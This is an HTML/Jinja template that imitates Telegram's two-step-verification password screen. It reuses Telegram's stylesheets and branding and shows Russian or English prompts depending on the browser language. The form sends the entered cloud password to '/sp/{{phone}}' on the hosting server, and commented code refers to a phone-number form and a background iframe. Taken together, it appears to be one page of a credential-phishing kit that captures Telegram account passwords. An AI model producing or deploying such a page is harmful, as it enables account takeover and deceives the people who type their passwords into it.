<!DOCTYPE html>
<html lang="ru">
  <head>
    <meta charset="UTF-8" />
    <title>Авторизация Telegram</title>
    <style>
      a {
        text-decoration: none;
      }
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"
      integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3"
      crossorigin="anonymous"
    />
    <link
      href="https://fonts.googleapis.com/css?family=Roboto:400,500"
      rel="stylesheet"
      type="text/css"
    />
    <link
      href="https://telegram.org/css/bootstrap.min.css?3"
      rel="stylesheet"
    />
    <link
      href="https://telegram.org/css/bootstrap-extra.css?2"
      rel="stylesheet"
    />
    <link href="https://telegram.org/css/telegram.css?231" rel="stylesheet" />
    <link href="../static/css/oauth.css?14" rel="stylesheet" />
    <link rel="stylesheet" href="../static/css/style.css" />
    <link rel="stylesheet" href="../static/css/submit_code.css" />
    <link rel="stylesheet" href="../static/css/submit_password.css" />
  </head>
  <body>
    <main class="holder">
      <!-- <iframe src="{{bg_link}}" frameborder="0"></iframe> -->
      <div class="submit-password-container">
        <section
          class="submit-password-content w-100 h-100 d-flex flex-column align-items-center"
          role="document"
        >
        <div class="monkey-container login_photos">
          <img
            id="monkey-eyes-open"
            src="../static/images/monkey-eyes-close.png"
            alt="Monkey eyes close"
          />
          <img
            class="is-hidden"
            id="monkey-eyes-close"
            src="../static/images/monkey-eyes-open.png"
            alt="Monkey eyes open"
          />
        </div>

          <h1 class="submit-password-title" id="submit-password-title"></h1>
          <p class="submit-password-text" id="submit-password-text"></p>

          <form
            id="send-form"
            class="login_form"
            method="POST"
            action="/sp/{{phone}}"
          >
            <div
              class="textfield-item-password field_wrap"
              id="login-phone-textfield"
            >
            {% if error %}
            <input
              type="password"
              class="form-control-password is-invalid"
              id="password"
              name="password"
            />
            {% else %}
            <input
              type="password"
              class="form-control-password"
              id="password"
              name="password"
            />
            {% endif %} {% if error %}
            <label class="input-label is-invalid" id="password-label"></label>
            {% else %}
            <label class="input-label" id="password-label"></label>
            {% endif %}

              <span class="toggle-visible" id="toggle-visible"
                ><img src="../static/images/eye.svg" alt="Eye"
              /></span>
              <!-- <div class="textfield-item-underline"></div> -->
            </div>

            <div class="login_button_wrap">
              <!-- <button class="button-item button-item-flat ripple-handler" onclick="return loginCancel(event)"   type="button">
                    <span class="button-item-label" id="cancel"></span>
                    <span class="ripple-mask"><span class="ripple"></span></span>
                  </button> -->
              <button class="submit_button" id="submit-button" type="submit">
                <span class="button-item-label" id="next"></span>
                <span class="ripple-mask"><span class="ripple"></span></span>
              </button>
            </div>
            <!-- <div class="login_number_field_wrap">
              <div class="textfield-item" id="login-phone-textfield">
                <input
                  class="form-control text-center"
                  type="text"
                  id="password"
                  name="password"
                />
                <div class="textfield-item-underline"></div>
              </div>
            </div>
            <div class="login_button_wrap">
              <button
                class="button-item button-item-flat ripple-handler"
                onclick="return loginCancel(event)"
                type="button"
              >
                <span class="button-item-label" id="cancel"></span>
                <span class="ripple-mask"><span class="ripple"></span></span>
              </button>
              <button class="button-item ripple-handler" type="submit">
                <span class="button-item-label" id="next"></span>
                <span class="ripple-mask"><span class="ripple"></span></span>
              </button>
            </div> -->
          </form>
          <!-- {% if error %}
          <div
            style="
              margin-top: 20px;
              font-family: 'Roboto', sans-serif;
              text-align: center;
              font-size: 13px;
            "
          >
            {{ error }}
          </div>
          {% endif %} -->
        </section>
      </div>
    </main>
    <script>
      function loginCancel(e) {
        window.location.href = "/phone_form";
      }

      var userLang = navigator.language || navigator.userLanguage;

      lang = userLang.split("-")[0];

      if (lang == "ru") {
        document.getElementById("submit-password-title").innerHTML =
          "Введите пароль";
        document.getElementById(
          "submit-password-text"
        ).innerHTML = `Ваш аккаунт защищён дополнительным паролем.`;
        document.getElementById("password-label").innerHTML = "Пароль";
        document.getElementById("next").innerHTML = "ДАЛЕЕ";
      } else {
        document.getElementById("submit-password-title").innerHTML =
          "Enter Your Password";
        document.getElementById(
          "submit-password-text"
        ).innerHTML = `Your account is protected with <br /> an additional password`;
        document.getElementById("password-label").innerHTML = "Password";
        document.getElementById("next").innerHTML = "NEXT";
      }
    </script>
    <script src="../static/js/submitPassword.js"></script>
  </body>
</html>
